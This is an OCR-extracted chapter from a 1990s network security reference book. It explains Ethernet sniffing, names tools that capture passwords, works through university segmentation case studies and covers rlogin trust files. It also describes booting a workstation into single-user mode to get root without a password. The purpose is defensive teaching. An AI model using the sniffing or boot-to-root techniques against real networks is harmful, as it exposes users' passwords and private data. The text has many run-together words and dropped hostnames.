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p1vPHCP/tr2 Internet Security Pro Ref 557-7 dc 1-23-96 Parts LP#2






Gaining Access and Securingthe Gateway

6 IP Spoofing and Sniffing .........................................................257

7 How to Build a Firewall .........................................................317

8 SATAN and the Internet Inferno ............................................ 429

9 Kerberos .................................................................................535


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257IP Spoofing and Sniffing

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IP Spoofing and Sniffing







6niffing and spoofing are security threats that target the

lower layers of the networking infrastructure supporting

applications that use the Internet. Users do not interact

directly with these lower layers and are typically

completely unaware that they exist. Without a deliber-

ate consideration of these threats, it is impossible to

build effective security into the higher levels.

Sniffing is a passive security attack in which a machine

separate from the intended destination reads data on a

network. The term “sniffing” comes from the notion of

“sniffing the ether” in an Ethernet network and is a

bad pun on the two meanings of the word “ether.”

Passive security attacks are those that do not alter the

normal flow of data on a communication link or inject

data into the link.


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258 Part II: Gaining Access and Securing the Gateway

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Spoofing is an active security attack in which one machine on the network masquerades as adifferent machine. As an active attack, it disrupts the normal flow of data and may involveinjecting data into the communications link between other machines. This masquerade aims tofool other machines on the network into accepting the impostor as an original, either to lurethe other machines into sending it data or to allow it to alter data. The meaning of “spoof”here is not “a lighthearted parody,” but rather “a deception intended to trick one into accept-ing as genuine something that is actually false.” Such deception can have grave consequencesbecause notions of trust are central to many networking systems. Sniffing may seem innocuous(depending on just how sensitive and confidential you consider the information on yournetwork), some network security attacks use sniffing as a prelude to spoofing. Sniffing gatherssufficient information to make the deception believable.

SniffingSniffing is the use of a network interface to receive data not intended for the machine in whichthe interface resides. A variety of types of machines need to have this capability. A token-ringbridge, for example, typically has two network interfaces that normally receive all packetstraveling on the media on one interface and retransmit some, but not all, of these packets onthe other interface. Another example of a device that incorporates sniffing is one typicallymarketed as a “network analyzer.” A network analyzer helps network administrators diagnose avariety of obscure problems that may not be visible on any one particular host. These problemscan involve unusual interactions between more than just one or two machines and sometimesinvolve a variety of protocols interacting in strange ways.

Devices that incorporate sniffing are useful and necessary. However, their very existenceimplies that a malicious person could use such a device or modify an existing machine to snoopon network traffic. Sniffing programs could be used to gather passwords, read inter-machinee-mail, and examine client-server database records in transit. Besides these high-level data, low-level information might be used to mount an active attack on data in another computersystem.

Sniffing: How It Is DoneIn a shared media network, such as Ethernet, all network interfaces on a network segment haveaccess to all of the data that travels on the media. Each network interface has a hardware-layeraddress that should differ from all hardware-layer addresses of all other network interfaces onthe network. Each network also has at least one broadcast address that corresponds not to anindividual network interface, but to the set of all network interfaces. Normally, a networkinterface will only respond to a data frame carrying either its own hardware-layer address inthe frame’s destination field or the “broadcast address” in the destination field. It responds tothese frames by generating a hardware interrupt to the CPU. This interrupt gets the attentionof the operating system, and passes the data in the frame to the operating system for furtherprocessing.

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Note The term “broadcast address” is somewhat misleading. When the sender wants toget the attention of the operating systems of all hosts on the network, he or she usesthe “broadcast address.” Most network interfaces are capable of being put into a“promiscuous mode.” In promiscuous mode, network interfaces generate a hard-ware interrupt to the CPU for every frame they encounter, not just the ones withtheir own address or the “broadcast address.” The term “shared media” indicates tothe reader that such networks broadcast all frames—the frames travel on all thephysical media that make up the network.

At times, you may hear network administrators talk about their networking trouble spots—when they observe failures in a localized area. They will say a particular area of the Ethernet isbusier than other areas of the Ethernet where there are no problems. All of the packets travelthrough all parts of the Ethernet segment. Interconnection devices that do not pass all theframes from one side of the device to the other form the boundaries of a segment. Bridges,switches, and routers divide segments from each other, but low-level devices that operate onone bit at a time, such as repeaters and hubs, do not divide segments from each other. If onlylow-level devices separate two parts of the network, both are part of a single segment. Allframes traveling in one part of the segment also travel in the other part.

The broadcast nature of shared media networks affects network performance and reliability sogreatly that networking professionals use a network analyzer, or sniffer, to troubleshootproblems. A sniffer puts a network interface in promiscuous mode so that the sniffer canmonitor each data packet on the network segment. In the hands of an experienced systemadministrator, a sniffer is an invaluable aid in determining why a network is behaving (ormisbehaving) the way it is. With an analyzer, you can determine how much of the traffic is dueto which network protocols, which hosts are the source of most of the traffic, and which hostsare the destination of most of the traffic. You can also examine data traveling between aparticular pair of hosts and categorize it by protocol and store it for later analysis offline. Witha sufficiently powerful CPU, you can also do the analysis in real time.

Most commercial network sniffers are rather expensive, costing thousands of dollars. Whenyou examine these closely, you notice that they are nothing more than a portable computerwith an Ethernet card and some special software. The only item that differentiates a snifferfrom an ordinary computer is software. It is also easy to download shareware and freewaresniffing software from the Internet or various bulletin board systems.

The ease of access to sniffing software is great for network administrators because this type ofsoftware helps them become better network troubleshooters. However, the availability of thissoftware also means that malicious computer users with access to a network can capture all thedata flowing through the network. The sniffer can capture all the data for a short period oftime or selected portions of the data for a fairly long period of time. Eventually, the malicioususer will run out of space to store the data—the network I use often has 1000 packets persecond flowing on it. Just capturing the first 64 bytes of data from each packet fills up mysystem’s local disk space within the hour.

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Note Esniff.c is a simple 300-line C language program that works on SunOS 4.x. Whenrun by the root user on a Sun workstation, Esniff captures the first 300 bytes of eachTCP/IP connection on the local network. It is quite effective at capturing allusernames and passwords entered by users for telnet, rlogin, and FTP.

TCPDump 3.0.2 is a common, more sophisticated, and more portable Unix sniffingprogram written by Van Jacobson, a famous developer of high-quality TCP/IPsoftware. It uses the libpcap library for portably interfacing with promiscuous modenetwork interfaces. The most recent version is available via anonymous FTP

NetMan contains a more sophisticated, portable Unix sniffer in several programs inits network management suite. The latest version of NetMan is available viaanonymous FTP to in the directory /pub/netman.

EthDump is a sniffer that runs under DOS and can be obtained via anonymous FTPfrom in the directory /pub/networking/inet/ethernet/.

On some Unix systems, TCPDump comes bundled with the vendor OS. Whenrun by an ordinary, unprivileged user, it does not put the network interface intopromiscuous mode. With this command available, a user can only see data beingsent to the Unix host, but is not limited to seeing data sent to processes owned bythe user. Systems administrators concerned about sniffing should remove userexecution privileges from this program.

Sniffing: How It Threatens SecuritySniffing data from the network leads to loss of privacy of several kinds of information thatshould be private for a computer network to be secure. These kinds of information include thefollowing:

■ Passwords

■ Financial account numbers

■ Private data

■ Low-level protocol information

The following subsections are intended to provide examples of these kinds.


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Sniffing PasswordsPerhaps the most common loss of computer privacy is the loss of passwords. Typical users typea password at least once a day. Data is often thought of as secure because access to it requires apassword. Users usually are very careful about guarding their password by not sharing it withanyone and not writing it down anywhere.

Passwords are used not only to authenticate users for access to the files they keep in theirprivate accounts but other passwords are often employed within multilevel secure databasesystems. When the user types any of these passwords, the system does not echo them to thecomputer screen to ensure that no one will see them. After jealously guarding these passwordsand having the computer system reinforce the notion that they are private, a setup that sendseach character in a password across the network is extremely easy for any Ethernet sniffer tosee. End users do not realize just how easily these passwords can be found by someone using asimple and common piece of software.

Sniffing Financial Account NumbersMost users are uneasy about sending financial account numbers, such as credit card numbersand checking account numbers, over the Internet. This apprehension may be partly because ofthe carelessness most retailers display when tearing up or returning carbons of credit cardreceipts. The privacy of each user’s credit card numbers is important. Although the Internet isby no means bulletproof, the most likely location for the loss of privacy to occur is at theendpoints of the transmission. Presumably, businesses making electronic transactions are asfastidious about security as those that make paper transactions, so the highest risk probablycomes from the same local network in which the users are typing passwords.

However, much larger potential losses exist for businesses that conduct electronic fundstransfer or electronic document interchange over a computer network. These transactionsinvolve the transmission of account numbers that a sniffer could pick up; the thief could thentransfer funds into his or her own account or order goods paid for by a corporate account.Most credit card fraud of this kind involves only a few thousand dollars per incident.

Sniffing Private DataLoss of privacy is also common in e-mail transactions. Many e-mail messages have beenpublicized without the permission of the sender or receiver. Remember the Iran-Contra affairin which President Reagan’s secretary of defense, Caspar Weinberger, was convicted. A crucialpiece of evidence was backup tapes of PROFS e-mail on a National Security Agency computer.The e-mail was not intercepted in transit, but in a typical networked system, it could havebeen. It is not at all uncommon for e-mail to contain confidential business information orpersonal information. Even routine memos can be embarrassing when they fall into the wronghands.

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262 Part II: Gaining Access and Securing the Gateway

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Sniffing Low-Level Protocol InformationInformation network protocols send between computers includes hardware addresses of localnetwork interfaces, the IP addresses of remote network interfaces, IP routing information, andsequence numbers assigned to bytes on a TCP connection. Knowledge of any of this informa-tion can be misused by someone interested in attacking the security of machines on thenetwork. See the second part of this chapter for more information on how these data can poserisks for the security of a network. A sniffer can obtain any of these data. After an attacker hasthis kind of information, he or she is in a position to turn a passive attack into an active attackwith even greater potential for damage.

Protocol Sniffing: A Case StudyAt one point in time, all user access to computing facilities in the organization under study(the university at which the author is employed) was done via terminals. It was not practical tohardwire each terminal to the host, and users needed to use more than one host. To solve thesetwo problems, Central Computing used a switch (an AT&T ISN switch) between the termi-nals and the hosts. The terminals connected to the switch so that the user had a choice ofhosts. When the user chose a host the switch connected the terminal to the chosen host via avery real, physical connection. The switch had several thousand ports and was, in theory,capable of setting up connections between any pair of ports. In practice, however, some portsattached to terminals and other ports attached to hosts. Figure 6.1 illustrates this setup.

Figure 6.1Case study system

before networking.~2500 Input

~400 Output

[SN Switcher]

IBM Mainframe




To make the system more flexible, the central computing facility was changed to a new systemthat uses a set of (DEC 550) Ethernet terminal servers with ports connected to the switch,rather than the old system, which used a fixed number of switch ports connected to each host.The new terminal servers are on an Ethernet segment shared by the hosts in the centralmachine room.

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Offices have a cable running from a wallplate to a wiring closet punchdown block. The punch-down block has cables running to multiplexers which in turn connect to the switch. Themultiplexers serve to decrease the number of cables that need to be long. With this arrange-ment sniffing or other forms of security problems are not an issue. No two offices share anymedia. The switch mediates all interaction between computers, isolating the flow of data awayfrom the physical location of the end users (see fig. 6.2).

Figure 6.2Case study system afternetworking of machineroom but beforenetworking of user areas.

~2500 Input~400 Output

[SN Switcher]

IBM Mainframe




Terminal Server

Terminal Server

Terminal Server

Ethernet Hub

Rather than using simple terminals, however, most computer users have a computer on theirdesktop that they use in addition to the Central Computing computers. The switch servicesthese computers as well as simple terminals. The number of computer users, however, hasgrown rapidly over the past decade and the switch is no longer adequate. Terminal ports are inshort supply, host ports are in even shorter supply, and the switch does not supply particularlyhigh-speed connections.

To phase out the switch, Central Computing installed an Ethernet hub in the basem*nt ofeach building next to the punchdown block used to support both the switch multiplexer andthe telephone lines. The hubs in the basem*nts connect to the central facility using fiber-opticcables to prevent signal degradation over long distances. Hubs also were placed in the wiringclosets on each floor of each building that connected to the basem*nt hub. Now the cablesleading to the wallplates in the offices are being moved from the punchdown block that leadsto the multiplexer to a punchdown block that leads to one of these hubs. The new wiringscheme neatly parallels the old and was changed relatively inexpensively. Figure 6.3 illustratesthe system after the networking of user areas. Figure 6.4 shows the user area networking detail.

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Although the new wiring scheme neatly parallels the old, the data traveling on the new wiringscheme does not neatly parallel its previous path. From a logical standpoint, it can get to thesame places, but the data can and does go to many other places as well. Under this scheme, anyoffice can sniff on all the data flowing to Central Computing from all of the other offices inthe building. Different departments are located in the same building. These departmentscompete for resources allocated by upper management and are not above spying on oneanother. Ordinary staff, the managers that supervise them, and middle management all arelocated in the same building. A fair amount of potential exists for employees to want to knowwhat other people are sending in e-mail messages, storing in personnel files, and storing inproject planning files.

In addition to nosiness and competition, a variety of people sharing the same physical media inthe new wiring scheme, could easily misuse the network. Since all occupants of a building

IBM Mainframe



Ethernet Hub

Ethernet Hub

Ethernet Hub

Ethernet Hub


Figure 6.3Case study system after

networking of user areas.

Mac OS

MS Windows


Punch Block


Staff Offices


NetWare Server

NFS Server

Departmental Machine Room

Figure 6.4Case study user area

networking detail.

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share a single set of Ethernet hubs, they broadcast all of their network traffic to every networkinterface in the entire building. Any sensitive information that they transmit is no longerlimited to a direct path between the user’s machine and the final destination, anyone in thebuilding can intercept the information with a sniffer. However, some careful planning ofnetwork installation or a redesign of an existing network should include security considerations(as well as performance issues) to avoid the risks inherent in shared media networking.

The network in the case study fails miserably in the prevention of sniffing. Any computer in abuilding is capable of sniffing the network traffic to or from any other computer in thebuilding. The following section describes how to design a network that limits the sharing ofmedia to prevent sniffing by untrustworthy machines.

Sniffing: How to Prevent ItTo be able to prevent a sniffing attack, you first need to understand the network segments andtrust between computer systems.

Network SegmentationA network segment consists of a set of machines that share low-level devices and wiring and seethe same set of data on their network interfaces. The wires on both sides of a repeater areclearly in the same network segment because a repeater simply copies bits from one wire to theother wire. An ordinary hub is essentially a multiport repeater; all the wires attached to it arepart of the same segment.

In higher-level devices, such as bridges, something different happens. The wires on oppositesides of a bridge are not part of the same segment because the bridge filters out some of thepackets flowing through it. The same data is not flowing on both sides of the bridge. Somepackets flow through the bridge, but not all. The two segments are still part of the samephysical network. Any device on one side of the bridge can still send packets to any device onthe other side of the bridge. However, the exact same sets of data packets do not exist on bothsides of the bridge. Just as bridges can be used to set up boundaries between segments, so canswitches. Switches are essentially multiport bridges. Because they limit the flow of all data, acareful introduction of bridges and switches can be used to limit the flow of sensitive informa-tion and prevent sniffing on untrustworthy machines.

The introduction of switches and bridges into a network is traditionally motivated by factorsother than security. They enhance performance by reducing the collision rate of segments,which is much higher without these components. Switches and bridges overcome the timedelay problems that occur when wires are too long or when simple repeaters or hubs introduceadditional time delay. As one is planning the network infrastructure one should keep theseother factors in mind as well. One can use these factors to sell the introduction of additionalhardware to parties less concerned with security.

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A segment is a subset of machines on the same subnet. Routers are used to partition networksinto subnets. Hence, they also form borders between segments in a network. Unlike bridgesand switches, which do not interact with software on other devices, routers interact withnetwork layer software on the devices in the network. Machines on different subnets are alwayspart of different segments. Segments are divisions within subnets, although many subnetsconsist of a single segment in many networks. Dividing a network into subnets with routers isa more radical solution to the sniffing problem than dividing subnets into segments. However,as you will see in a later section, it may help with some spoofing problems.

Segmentation of a network is the primary tool one has in fighting sniffing. Ideally, eachmachine would be on its own segment and its interface would not have access to network datafor which it is not the destination. This ideal can be accomplished by using switches instead ofhubs to connect to individual machines in a 10BASE-T network. As a matter of practicalityand economics, however, one must often find a less ideal solution. Such solutions all involvethe notion of trust between machines. Machines that can trust each other can be on the samesegment without worry of one machine sniffing at the other’s data.

Understanding TrustTypically, one thinks of trust at the application layer between file servers and clients. Clearly,the file server trusts its clients to authenticate users. However, this notion of trust extends tolower-level network devices as well. For example, at the network layer, routers are trusted todeliver datagrams and correct routing tables to the hosts on their networks. Hosts are trustingof routers and routers are trusted machines. If you extend the concept of trust down to thedata link layer one gets to sniffing. A machine sending data considered private on a particularnetwork segment must trust all machines on that network segment. To be worthy of that trust,the machines on the segment and the wiring between them must have sufficient physicalsecurity (locks on doors, armed guards, and such) to ensure that an attacker cannot install asniffer on that segment.

The threat of sniffing comes from someone installing sniffing software on a machine normallyon the network, someone taking a sniffer into a room and jacking it into the network connec-tions available there, or even installing an unauthorized network connection to sniff. Tocounter these options, you must rely on the security of the operating system itself to preventthe execution of unauthorized sniffing, the personal trustworthiness of the people who haveaccess to the rooms in which network components are located, and physical security to preventuntrustworthy people from gaining access to these rooms.

Hardware BarriersTo create trustworthy segments, you must set up barriers between secure segments andinsecure segments. All of the machines on a segment must mutually trust each other with thedata traveling on the segment. An example of such a segment would be a segment that doesnot extend outside the machine room of a computing facility. All machines are under the

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control of a cooperating and mutually trusting systems staff. The personal trust between staffmembers is mirrored by the mutual trust between the systems for which they are responsible.

The opposite of this is the belief and understanding that some segments simply must beconsidered insecure. Insecure segments need not be trusted if those segments carry only publicor non-critical data. An example of such a segment is a university laboratory used only bystudents. No guarantee of absolute security is made for the information stored. Possibly thestudents realize that for this network drive only reasonable precautions will be taken tomaintain privacy by enforcement of password protections, file system access lists, and regularbackups.

It is less clear where to draw the line in a more professional business setting. The only basis fortrust between machines is for trust between the people who control the machines. Even if aperson can be trusted personally in an ethical sense, he or she may not be trustworthy techni-cally to administer a machine in such a way that an attacker could not abuse the machineunder his or her control.

Suppose a set of machines has a set of trust relationships as shown in figure 6.5 (an arrowpoints from the trusting machine to the trusted machine). One needs to connect them to thenetwork in such a way that two machines that do not trust each other are on the same segmentand provide appropriate physical security to avoid tampering with a trusted machine. Onesuch partitioning is shown in figure 6.6 (the lines between segments indicate that the segmentsare connected by a device that limits data flow, such as a bridge).

Figure 6.5A simple set of trustrelationships betweenmachines An arrow pointsfrom the trusting machineto the trusted machines.

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Secure User SegmentsSecurity is a relative thing. How secure you make a segment is related to how much controlyou take away from the technically untrustworthy end user who uses the network in a locationwith limited physical security.

In some settings, you may consider it appropriate to remove control of a machine from the enduser because you cannot trust the end user from a technical standpoint. However, to actuallyremove control from the end user and prevent the end user machine from being used forsniffing, the machine on the end user’s desk essentially becomes a terminal. This may seemdisheartening, but keep in mind that terminals such as X Window System terminals providethe user with all the functionality of a workstation for running most Unix application soft-ware—they also have no moving parts and are virtually maintenance free.

If the end user cannot be trusted or if the software on a desktop machine could be altered bythe authorized end user because of the machine’s physical location, then the machine shouldnot be a personal computer. For the purposes of this discussion, a personal computer is onethat runs an operating system such as DOS, Windows 3.1, or Windows 95. These operatingsystems lack the notion of a privileged user in the sense that any user can run any programwithout interference from the operating system. Hence, any user can run a sniffer on such asystem. PCs have always been popular because they can be customized by the end user. Nosystem administrator can restrict what the end user can and cannot do with one of thesemachines. In highly secure settings, machines that use these operating systems are set upwithout local disks to prevent installation of unauthorized software such as a sniffer. Essen-tially, they become terminals that offload some of the work from the central, physically secureserver.

Insecure Segement

Secure Segment

One-Way Trust Segment

Mutually Trusting Segment

Mutually Trusting Segment

Figure 6.6A partitioning into

network segments of themachines in figure 6.5 that

satisfies the lack of trustbetween machines.

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A workstation running an operating system such as Windows NT, Unix, or VMS provides anextra degree of protection because these systems include privileged users, also known assuperusers (“administrator” in NT, “root” in Unix, and “system” in VMS) who must know aspecial password. These operating systems only allow access to certain hardware level opera-tions to superusers. If the end user has ordinary user access to the machine on his or her deskbut does not have superuser privileges, then the machine can be trusted to a larger degree thanthe user. It is still possible to bring alternative boot media to most workstation-class operatingsystems and obtain superuser privileges without knowing the superuser password. The moresecure systems, however, limit the user’s ability to install software. Usually the only softwarethat can be installed by the user is the operating system.

Note I once had to review the security arrangements on a set of (DECstation 3100)workstations. The system administrator in charge of the local network had desig-nated the workstations secure enough to be trusted by the file server to NFS mount afile system containing mission-critical data directories. I turned one of the worksta-tions off, waited a second and turned it back on. After a self-test, it came up with aboot monitor prompt. I was familiar with similar machines and knew I had twoalternatives, but was unsure what the effective difference would be on this particularmodel of workstation. As it turned out, one command (auto) would boot theworkstation directly into Unix multiuser mode, which is what the system administra-tor had always done. The system administrator was unaware of the results of tryingthe alternative command. When I tried the alternative command (boot), the worksta-tion booted directly into Unix single-user mode and gave the person at the keyboardsuperuser privileges without being required to issue a password.

These workstations clearly were not sufficiently secure to be trusted to NFS mountthe mission-critical disks. The documentation supplied with the workstations did notmention it. However, it turned out that the single-user mode can be passwordprotected with a password stored in non-volatile RAM under the control of the bootmonitor. Password protection made these workstations sufficiently secure to betrusted to mount the mission-critical disks. Absolute security is out of the question,since one can still reset the non-volatile RAM by opening the system box. On othersystems, the password may be circumvented with other methods.

Although this story has little to do with sniffing, it illustrates how trust can often leadto unexpected risks on machines outside the server room. By obtaining superuserprivileges, a user could not only sniff data, but do much more serious damage.

Segments with Mutually Trusting MachinesSome research at academic and industrial departments requires that the end user have completeaccess to the machine on the desktop. In these cases, a secure segment is probably out of thequestion unless the end users are impeccably ethical and technically competent to maintainsystem security on the machines they control (a machine administered by someone without

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security training is likely to be broken into by an attacker and used as a base of operations toattack other machines, including sniffing attacks). If you assume the end users are indeedcompetent to ensure the security of their own desktop system, all machines on the segment canbe considered mutually trusting with respect to sniffing. That is, while any of the machines onthe segment could be used as a sniffer, the users trust that they will not be based on the following:

■ The physical security of the machines

■ The technical competence of the other users to prevent outsiders from gaining control ofone of the machines remotely

■ The personal integrity of the other users

It is possible to build a secure subnet or local area network out of a set of segments that eachhave mutually trusting machines. You must locate machines that are not mutually trusting onseparate segments. Machines that need to communicate across segment boundaries should onlydo so with data that is not private. You can join mutually trusting segments by secure seg-ments. Such an arrangement presumes that the end users trust the staff operating these centralfacilities. However, from a practical standpoint all but the most paranoid end users find thisacceptable.

Connecting Segments of One-Way TrustConsider, for example, the simple situation of two segments of mutual trust. Mutual trustexists between the machines on the first segment and mutual trust exists between the machineson the second segment. However, the machines in the first segment are communicating lesssensitive information than those in the second segment. The machines in the first segment maytrust those in the second segment but not vice versa. In this case, it is allowable for the datafrom the first segment to flow through the second segment. However, you must use a barriersuch as a bridge to prevent the flow of data in the opposite direction.

One-way trust is fairly common between secure segments and other types of segments. The lesssecure machines must trust the more secure machines, but not vice versa. Similarly, one waytrust may exist between a segment of mutual trust and an insecure segment. Connectingsegments with one way trust via bridges and routers leads to a hierarchy of segments. Treediagrams represent hierarchies graphically. In this case, the parent-child relationship in the treeassociates the parent with a more secure segment and the child with a less secure segment.Thus, the more secure segments are closer to the root of the tree and less secure segments arecloser to the leaves—insecure segments are leaves in the tree representing the one-way trusthierarchy.

Insecure SegmentsIn many cases, it is not practical to construct the segment boundaries between machines thatare not mutually trusting. The reason for this is that such a setup isn’t safe from sniffing.

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Insecure segments might be acceptable in areas where security requirements are also low.However, most users expect a higher level of security than any such setup could provide.

If you must use an insecure segment and still expect a higher degree of security, your onlysolution is software-based techniques rather than hardware-based techniques, such as encryp-tion technology.

Case Study: A Small Department SubnetA good case study of a network system at risk is in building at the university where I work.Computer Science shares two floors of the building with Mathematics and English. On thelower floor are several rooms with computers that are accessible by clients of ComputerScience, offices for professional staff members in each of the three departments, and theComputer Science machine room. On the upper floor are offices for professional staff mem-bers of Computer Science and Mathematics and the office suites for the managers and secre-tarial staff of each.

The rooms in which clients access the network are not secure. Professional staff members ineach department are mutually trusting of each other. They are not mutually trusting of allmembers of other departments. The two management suites cannot trust each other. Theycannot trust the professional staff they supervise because they work with sensitive employeerecords dealing with performance reviews, salary recommendations, and compete for resourcesprovided by higher levels of management.

In fact, the management suites are equipped with a higher level of physical security than theprofessional staff offices. These suites may be considered secure relative to the offices of thestaff they supervise. The machines in each suite can be considered mutually trusting of othermachines, because the personnel share sensitive information with each other anyway (see fig.6.7). Finally, the Computer Science machine room is secure.

Math Staff

Math Management

Computer Science Machine Room

Computer Science Management

Computer Science Staff

English Staff

Computer Science Clients

To satisfy the constraints of these trust relationships, the staff members of Computer Science,Mathematics, and English must each be placed on a separate segment. The Mathematicsmanagement suite must be placed on a separate segment. However, data to and from theMathematics staff may flow through the Mathematics management suite without violating thetrust constrains. In an exact parallel, the Computer Science management suite can have asegment with data flowing through it to and from the Computer Science staff segment. Themachines used by Computer Science clients may transmit through staff and management

Figure 6.7Trust relationshipsbetween groups ofmachines in case study.

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segments. Notice the fact that we have a hierarchy of trust being in effect here. At the top endof the hierarchy is the Computer Science machine room, which must be on its own segment aswell.

Now consider the wiring system available to service these two floors. The lower floor has asingle communication closet that contains the connection to the central computing facility.The upper floor has a primary communication closet immediately above it connected by aconduit through the flooring. This primary communication closet on the upper floor is closeto the Mathematics management suite. The primary closet connects, via a wiring conduit, to asecondary communication closet on the opposite side of the upper floor close to the ComputerScience management suite.

If you do not consider security, you will design the network by looking purely at cost andperformance. The minimum cost solution is simply to locate a set of hubs in each communica-tions closet and connect all the hubs together to form a single segment. From a performancestandpoint the management personnel do not want to have their network activity slowed bythe activity of the staff they supervise or by people from a different department, so one canargue to segment the network on the basis of performance in a way that is close to what isneeded for security purposes. If cost is not an issue, each of the proposed segments can simplybe connected by a switch.

A realistic solution needs to do the following:

■ Balance the issues of cost and performance

■ Take into consideration the physical layout of the building

■ Maintain security by not violating the trust constraints

Figure 6.8 shows such a solution. Mathematics places all of its staff on a single segment byconnecting hubs in the upper and lower floor communication closets. The Mathematicsmanagement suite has a segment that bears the burden of traffic from the staff segment. WhileMathematics has a lower cost solution, Computer Science has a higher performance solution.Computer Science has five separate segments joined by a switch. Computer Science staff areplaced on two separate segments, one for the upper floor and one for the lower floor, not tosatisfy any security concern, but because separate hubs on each floor simplified the wiring andprovide a low-cost opportunity to enhance performance. Computer Science, Mathematics, andEnglish each have a separate subnet. These three subnets are joined into a single network by arouter located in the communication closet on the lower floor.

The solution shown in figure 6.8 provides for reasonable security against sniffing. Absolutesecurity is not provided since it is still possible for anyone to hook up a sniffer on any of thesegments. However, data from areas where more security is needed do not flow through areaswhere less security is needed. The areas where more security is needed have higher levels ofphysical security as well. Hence, it is increasingly difficult to physically get to a location wheresensitive data is flowing on the wires. Also, except on the insecure Computer Science client

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segment, there is trust between the authorized users of the machines sharing a segment. Hence,an authorized user of a machine cannot use it to sniff data going to or from someone who doesnot trust the user.

You can learn several things from looking at the case study and its solution:

■ A minimum cost solution is not likely to provide for security.

■ A totally secure system is prohibitively expensive, but a reasonably secure system is not.

■ Different approaches to cost and performance trade-offs may be combined in a securesystem. Mathematics and Computer Science have different budgets for equipment andneeds for network performance.

■ A single solution may provide both security and enhance performance as in the solutionshown for Computer Science.

■ A solution that provides for security adds significantly to cost. There is almost no costdifference between having a single segment for Mathematics and the solution shown. Anextra wire run from the lower floor staff hub to the upper floor staff hub is one extra costitem as is the bridge separating the two segments.

Computer Science Management

Computer Science Staff

Math Management

Math Staff

Computer Science Staff

Computer Science Machine Room

Computer Science Clients

English Staff

Math Staff








Hub Hub


Figure 6.8Wiring system to satisfytrust constraints and fit thebuilding layout.

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Tip A simple hardware barrier that is inexpensive and has the potential for increasingnetwork performance is the installation of a bridge between your machine room andthe rest of your facility. In many cases, a great deal of traffic occurs between thecomputers in the machine room. A bridge placed between the machine room andthe rest of the facility prevents this traffic from escaping to less secure areas andreduces the collision rate outside the machine room. Bridges are much less expen-sive than a router or a switch. In fact, a low-cost personal computer may beconfigured for this purpose with free software such as Drawbridge.

Drawbridge is a free software package that turns an ordinary PC with a pair of standardEthernet interfaces into a bridge. Drawbridge is also capable of filtering operations and can actas a cheap alternative to a firewall in small networks. In some cases, you may be able to recyclea used PC considered obsolete for this purpose as the memory and disk requirements ofDrawbridge are quite modest.

So far, this section has covered how to avoid sniffing of data from the local part of the Internet.Such an action seems directed toward protection against internal personnel rather than externalthreats. However, many security breaches are aided either knowingly or unknowingly byinternal personnel. In such cases, the hardware barriers described in this section will limit whatan intruder, physically present or remote, can do with a sniffer. Not only is physical securitygreater for the more trusted segments, but so is the technical competence of those in charge ofthe computer systems. The least technically competent to protect a system from remoteintruders must be given systems that cannot be given commands from a remote location (suchas a simple personal computer). Systems that can accept commands from remote locationsmust be administered by those technically competent enough to prevent remote intruders bynot making mistakes that will allow remote intruders to gain access to the systems.

Avoiding Transmission of PasswordsIn some sense, the prevention of sniffing by installing hardware barriers may be considered thelast line of defense in a security system. When building medieval fortresses, the last line ofdefense was typically the most formidable but could only protect those who would be leftinside after the outer defenses had been breached. In dealing with sniffing, the first line ofdefense is simply not to transmit anything sensitive on the network in the first place. The localhardware defenses may limit intrusion into the local systems. However, if authorized users mayaccess those systems from remote locations, one must not transmit sensitive information overremote parts of the Internet lest the information be sniffed somewhere along the way. Oneextreme that preserves security is simply not to permit access from remote locations. Also, themost formidable defenses against inward directed attack do nothing to provide for the securityof one leaving the area being protected. Legitimate Internet sessions initiated inside a networkwith those outside must also be protected.

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The most glaring security hole beyond simple loss of privacy is the opportunity for a sniffer togather passwords. The best way to deal with this problem is simply not to transmit cleartextpasswords across the network. Simply transmitting an encrypted password that could becaptured and replayed by a sniffer is also not acceptable. Several different methods are in use toprovide this kind of protection:

■ The rlogin family of protocols

■ Using encrypted passwords

■ Zero knowledge authentication

The rlogin Family of ProtocolsThe rlogin protocol, originally used with Unix-to-Unix terminal sessions, uses end-to-endmutual trust to avoid the transmission of any form of password. The protocol requires that theserver trust the client to authenticate the user. The user places a file on the server indicatingwhat combinations of username and hostname may connect to a particular account onmachines using the server. The user may connect from these without presenting any furthercredentials such as a password.

This file is called the rhosts file. For the original Unix server, the filename had to be precededwith a dot, “.rhosts,” but on non-Unix systems using this protocol, the file may have to have adifferent name to satisfy the constraints imposed for filenames or different mechanisms used tostore the information about what users are accepted on what trusted systems. The user musttrust that the server is sufficiently secure, that no one else can alter the rhosts file and thatno one else can read the rhosts file. The requirement that the rhosts file not be altered isobvious—if someone modified the rhosts file, he or she could connect to the account via therlogin protocol without the permission of the legitimate user. The requirement that no oneelse can read the rhosts file is a bit more obscure, but learned from painful experience. If anattacker gains access to another account on the machine hosting the rlogin server, the attackercan read the rhosts file of a user and target the user for an indirect attack. In an indirect attack,the attacker attempts to gain access to an account listed in the rhosts file on another machineand use it to obtain access to the machine hosting the rlogin server.

Another file used by some servers for the rlogin protocol is called the host equivalence file,which is named “/etc/hosts.equiv” in the original Unix implementation. Any user of any hostlisted in the host equivalence file may access an account with the same username on themachine on which the host equivalence file exists without presenting a password. The use of ahost equivalence file adds convenience for the user by relieving individual users from the needto create their own rhosts file. However, it opens up users to the risks of ARP spoofing andname server spoofing (both covered later in this chapter) without the implicit consent they giveto that risk when creating their own rhosts file. System administrators are strongly urged not touse a host equivalence file because of those risks. Users without the network savvy to create anrhosts file are being put at risk from a threat they have no possibility of understanding.

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Note The rlogin protocol is used by a whole family of programs that use the sameauthentication protocol. The family is collectively referred to as the r-commands.The family includes rlogin for terminal sessions, rsh for remote shell execution ofcommand-line programs, and rcp for remote file copying. rcp is preferred over FTPfor its security and ease of use. It is secure because it does not require the transmis-sion of a password and it is easier to use because it can transfer multiple filesspecified with the same syntax as the local file copying command.

The rlogin protocol remains vulnerable to ARP spoofing and DNS spoofing (discussed later inthis chapter). It also does not completely protect a user who uses machines that he or she doesnot control. For example, when you start an rlogin terminal session from a client’s orcolleague’s office, the client’s or colleague’s machine is not listed in your rhosts. In these cases,you must remember my password and have it transmitted across the network in plain sight ofany sniffers that may be out there.

Note The r-commands are not limited to Unix. DEC VMS has a variety of TCP/IP softwareavailable for it including both clients and servers for many of the programs in thisfamily. Many TCP/IP software packages for the PC offer r-command clients. There isa networking suite for Windows NT that provides an rlogin server, enabling you tohave access to the command line from a remote location without being logged intoit locally. There are many freeware packages that provide a similar server for any PCwith winsock.dll.

